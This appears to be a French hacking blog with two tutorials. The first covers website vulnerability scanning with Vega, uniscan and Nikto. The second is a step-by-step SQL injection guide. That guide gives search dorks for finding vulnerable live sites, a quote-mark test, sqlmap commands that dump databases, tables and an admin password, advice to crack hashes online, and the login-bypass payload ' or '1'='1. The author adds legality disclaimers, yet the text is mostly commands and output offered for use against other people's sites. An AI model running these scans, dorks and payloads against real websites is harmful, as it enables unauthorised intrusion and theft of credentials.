Scanner un site web

Dans  les tutoriels  précédents nous avons vu  les bases  de Metasploit , et comment fonctionnaient les injections SQL avec  l’outil SQLmap ,aujourd’hui nous verrons comment scanner un site a la recherche de vulnérabilités , pour ca nous utiliserons  3 outils différents ,  Vega ,uniscan ,  nikto     .

Pour éviter d’avoir  a télécharger tous  ces outils , installer Kali Linux une distribution Linux dédié  a la sécurité et l’audit . Tous ces outils  sont déjà sur Kali Linux.

Scan avec Vega

Vega est un scanner puissant et facile d’utilisation , en plus il est  en interface graphique . Si vous êtes sur Windows ou autre télechargez-le ici : https://subgraph.com/vega/download/ il a été programmé en Java , pour l’utiliser vous avez besoin de Java.

Une fois ouvert cliquez sur Scan < Start new scan rentrez votre url puis finish , après environ 10 minutes il vous montrera les différentes vulnérabilités , si vous scannez un  site qui  ne  vous appartient , c’est illégal et vous pouvez allez en  prison , demander l’autorisation avant  de le faire.

Scan avec UniscMan et Nikto

Uniscan et Nikto sont deux scripts Perl qui scanneront votre site en ligne  de commandes, télécharger Nikto ici : https://cirt.net/Nikto2 et uniscan ici : http://sourceforge.net/projects/uniscan/ et  vous aurez besoin de perl  ici:https://www.perl.org/get.html

maintenant ouvrez uniscan et faites

perl uniscan.pl -u http://www.target.com -qweds

ca va  bruteforcer tout les répertoires pour trouver de s fichiers sensibles et des vulnérabilités LFI ou RFI.

maintenant faites de même avec nikto

perl nikto.pl -h http://www.target.com

ca scannera le site

Je ne suis pas responsable  de   ce que vous faites ou si  vous l’utiliser a des fins malveillants,vous etes le seul responsable.

Mon fb : https://www.facebook.com/profile.php?id=100010263225038

 

Publicités

Les injections SQL

Aujourd’hui nous parlerons des injections SQL , les injections SQL sont les vulnérabilités les  plus présentes sur le web .

Ce tutoriel comportera 2 parties :

1.Explication des injections Sql

2.Exploitation de la vulnérabilité

Explication

l’injection SQl est  une vulnérabilité qui  exploite la mauvaise configuration d’une  base de données,                                                                                                    -avec l’injection SQL on   peut    récuperer le contenu d’une base de donnés.                                                                                                                                -on peut contourner  l’authentification d’un site.

Ainsi ,  on faisant une requête SQL modifié   on peut récuperer les mots  de passes d’un site  vulnérable   mais on peut aussi contourner le login , car quand vous rentrez votre mot de passe dans un site  ce site regarde dans la base de donnés s’il  correspond au votre mot de passe   ,  si nous tombons sur une   base de donnés vulnérable avec un bout de code nous nous connectons

trouver des sites vulnérables

Pour trouver des sites vulnérables faite une recherche avec ces dorks:

home.php?id=

index.php?id=

php?id=

pour savoir si un site est vulnérable rajouter un ‘ a la fin de l’url, si il y une erreur c’est  bon .

Exploitation

pour exploiter la  vulnérabilité SQL vous aurez besoin de SQLMAP un script python , si vous êtes sous Kali Linux il y est déjâ sinon télerchargez-le ici :  http://sqlmap.org/ et python  ici : https://www.python.org/download/releases/2.7.8/

sachez-le il est illégal de faire ca sur un site si  vous n’avez pas les droits , moi j’ai fait un environnement réaliste, imaginons que  mon site c’est https://www.aadzentreprise.org/home.php?id=2 ne cherchez pas il n’existe pas.

pour récuperer les bases de donnés faites

python sqlmap.py  -u https://www.aadzentreprise.org/home.php?id=2 –dbs                     la nous récuperenons les bases de données normalement  on doit voir ca

I—————–I
informations
I—————–I
aadzentreprise
I—————–I

comme vous voyez SQLMAP nous affiche 2 bases de donnés,  maintenant nous allons récuperer les  tables de la base de donnés  aadzentreprise , on fait

python sqlmap.py -u https://www.aadzentreprise.org/home.php?id=2 -D   aadzentreprise–tables

il nous affiche
I—————–I
home
I—————–I
users
I—————–I
site
I—————–I
page
I—————–I

nous avons  trouvé 4 tables , ce qui nous intéresse c’est la table des users,nous faisons

python sqlmap.py -u https://www.aadzentreprise.com/home.php?id=2 -D aadzentreprise  -T users  –columns

il affiche

I—————–I
admin_id
I—————–I
admin_name
I—————–I
admin_password
I—————–I

Bingo !!! nous avons trouvé les columns de l’admin il ne reste  qu’a voir leur contenu

nous faisons

python sqlmap.py -u https://www.aadzentreprise.com/home.php?id=2 -D aadzentreprise -T  users -C  admin_password –dump

il affiche

I—————–I
nounou123
I—————–I

Olé Olé on a trouvé le mot de passe de l’admin !!! Pas  si vite il se  peut que le mot de passe soit haché comme  ce-ci « AZsdd533:!:Fztez32 » pour le décrypter   utiliser ce site : md5decrypt.net

Contournement d’authentification

si vous  ne voulez pas vous casser la tête avec sqlmap , trouvez un site  vulnérable  aux injections SQL qui a un login  et faites ce-ci

Username : I admin I

Password I ‘ or ‘1’=’1 I

j’explique ce-ci va obliger le site a se connecter avec 1=1  comme  1 est toujours égal a 1 il sera forcé de se connecter.

j’espère que ce tutoriel vous aura plu 😀 sachez que c’est éducatif , je ne vous oblige  pas a pirater les sites des  autres , c’est illégal , vous êtes le seul responsable des dommages causés .

si vous avez des  problèmes contactez-moi :https://www.facebook.com/profile.php?id=100010263225038